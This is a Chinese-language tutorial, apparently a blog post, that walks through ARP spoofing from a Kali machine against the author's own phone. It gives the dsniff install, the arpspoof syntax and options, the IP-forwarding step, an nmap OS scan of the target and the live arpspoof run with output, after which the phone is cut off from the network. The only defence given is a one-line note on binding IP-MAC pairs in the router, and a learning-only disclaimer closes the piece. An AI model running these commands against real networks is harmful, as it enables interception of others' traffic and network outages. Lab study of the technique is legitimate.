ARP攻击与欺骗实战
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。
文章目录
ARP攻击原理
通过伪造IP地址和MAC地址的对应关系,使得网络无法正常通信。
ARP欺骗原理
欺骗源把自己伪装成网关(或另一台主机),向局域网内的目标主机发送ARP应答报文,使得局域网内的主机误以为欺骗源的MAC地址是网关(或另一台主机)的MAC地址,并将原本流向网关(或另一台主机)的数据都发送到欺骗源。
实施ARP欺骗
1.安装Arpspoof工具
sudo apt-get install dsniff
使用语法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
参数
-i interface 指定要使用的接口。
-c own|host|both 指定范围own|host|both(自己|主机|两者)
-t target 指定一台特定主机进行ARP中毒(如果未指定,则为LAN上的所有主机)
-r 毒害两个主机(主机和目标)以捕获两个方向的流量。(仅对-t有效)
host 指定您希望拦截数据包的host(通常是本地网关)
示例
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
192.168.1.100为攻击目标的IP,192.168.1.1为攻击目标的网关
2.开启路由转发
echo 1 > /proc/sys/net/ipv4/ip_forward
3.查看攻击机IP地址和ARP缓存表
查看IP地址:
root@kali:/home/sknife# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.105 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::20c:29ff:fe3f:1aea prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:3f:1a:ea txqueuelen 1000 (Ethernet)
RX packets 161798 bytes 139527686 (133.0 MiB)
RX errors 0 dropped 10 overruns 0 frame 0
TX packets 66839 bytes 16672614 (15.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 229 bytes 12275 (11.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 229 bytes 12275 (11.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
注:攻击机网络连接为桥接模式(必须和被攻击机在同一局域网下)。
查看ARP缓存表:
root@kali:/home/sknife# arp
Address HWtype HWaddress Flags Mask Iface
192.168.0.101 ether e4:a7:c5:43:ab:b1 C eth0
192.168.0.103 ether e4:34:93:d3:7c:26 C eth0
192.168.0.104 ether 30:24:32:e7:df:a6 C eth0
192.168.0.100 ether dc:72:9b:de:36:ad C eth0
192.168.0.102 ether 68:27:37:40:70:ce C eth0
192.168.0.1 ether f4:83:cd:00:99:a7 C eth0
注:192.168.0.1为网关,其他均为主机。
4.定位被攻击机
nmap扫描主机192.168.0.100
root@kali:/home/sknife# nmap -O 192.168.0.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-30 17:54 CST
Nmap scan report for 192.168.0.100
Host is up (0.026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
16080/tcp filtered osxwebadmin
MAC Address: DC:72:9B:DE:36:AD (Huawei Technologies)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.04 seconds
可以看出这是作者的华为(Huawei)手机
注:直接看手机的状态消息也可以知道IP地址。
5.开始攻击
在攻击机上执行命令:
oot@kali:/home/sknife# arpspoof -i eth0 -t 192.168.0.100 192.168.0.1
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
从输出信息可以看到,攻击机在向目标主机发送ARP应答包,告诉目标主机网关的MAC地址为00:0c:29:3f:1a:ea(攻击主机的MAC地址)。此时ARP欺骗已经成功,手机无法联网。
ARP欺骗防御
在路由器中绑定IP-MAC
声明
本文仅供网络安全爱好者学习探讨,请勿用于违法犯罪。